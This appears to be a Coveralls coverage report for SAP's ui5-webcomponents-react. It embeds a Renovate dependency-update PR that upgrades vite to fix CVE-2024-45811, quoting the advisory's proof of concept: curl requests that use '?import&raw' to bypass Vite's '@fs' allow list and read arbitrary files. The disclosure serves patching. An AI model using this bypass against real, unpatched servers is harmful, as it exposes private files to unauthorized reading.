
SAP / ui5-webcomponents-react / 10910485087
89%

Build:
DEFAULT BRANCH: main
Ran 17 Sep 2024 08:24PM UTC
Jobs 6
Files 227
Run time 1min
17 Sep 2024 08:20PM UTC coverage: 87.249%. Remained the same
10910485087

push

github

web-flow
chore(deps): update dependency vite to v5.4.6 [security] (#6378)

This PR contains the following updates:

| Package | Change | Age | Adoption | Passing | Confidence |
|---|---|---|---|---|---|
| [vite](https://vitejs.dev) ([source](https://redirect.github.com/vitejs/vite/tree/HEAD/packages/vite)) | [`5.4.5` -> `5.4.6`](https://renovatebot.com/diffs/npm/vite/5.4.5/5.4.6) | [![age](https://developer.mend.io/api/mc/badges/age/npm/vite/5.4.6?slim=true)](https://docs.renovatebot.com/merge-confidence/) | [![adoption](https://developer.mend.io/api/mc/badges/adoption/npm/vite/5.4.6?slim=true)](https://docs.renovatebot.com/merge-confidence/) | [![passing](https://developer.mend.io/api/mc/badges/compatibility/npm/vite/5.4.5/5.4.6?slim=true)](https://docs.renovatebot.com/merge-confidence/) | [![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/vite/5.4.5/5.4.6?slim=true)](https://docs.renovatebot.com/merge-confidence/) |

### GitHub Vulnerability Alerts

#### [CVE-2024-45811](https://redirect.github.com/vitejs/vite/security/advisories/GHSA-9cwx-2883-4wfx)

### Summary
The contents of arbitrary files can be returned to the browser.

### Details
`@fs` denies access to files outside of Vite serving allow list. Adding
`?import&raw` to the URL bypasses this limitation and returns the file
content if it exists.

### PoC
```sh
$ npm create vite@latest
$ cd vite-project/
$ npm install
$ npm run dev

$ echo "top secret content" > /tmp/secret.txt

# expected behaviour
$ curl "http://localhost:5173/@fs/tmp/secret.txt"

    <body>
      <h1>403 Restricted</h1>
      <p>The request url &quot;/tmp/secret.txt&quot; is outside of Vite serving allow list.

# security bypassed
$ curl "http://localhost:5173/@fs/tmp/secret.txt?import&raw"
export default "top secret content\n"
//# sourceMappingURL=data:application/json;base64,eyJ2...
```

---

### Release Notes

<details>
<summary>vitejs/vite (vite)</summary>

###
[`v5.4.6`](https://redirect.github.co... (continued)

2836 of 3792 branches covered (74.79%)

5043 of 5780 relevant lines covered (87.25%)

91925.38 hits per line

Uncovered Existing Lines

| Lines | Coverage | ∆ | File |
|---|---|---|---|
| 1 | 89.19 | -2.7% | packages/charts/src/components/ColumnChart/ColumnChart.tsx |

Subprojects

| ID | Flag name | Job ID | Ran | Files | Coverage |
|---|---|---|---|---|---|
| 1 | main/src/components | 10910485087.1 | 17 Sep 2024 08:28PM UTC | 158 | 84.57 |
| 2 | compat | 10910485087.2 | 17 Sep 2024 08:24PM UTC | 169 | 19.32 |
| 3 | main/src/internal | 10910485087.3 | 17 Sep 2024 08:24PM UTC | 158 | 15.99 |
| 4 | charts | 10910485087.4 | 17 Sep 2024 08:25PM UTC | 216 | 28.72 |
| 5 | base | 10910485087.5 | 17 Sep 2024 08:25PM UTC | 158 | 16.08 |
| 6 | cypress-commands | 10910485087.6 | 17 Sep 2024 08:24PM UTC | 158 | 15.5 |
  • 437a49e6 on github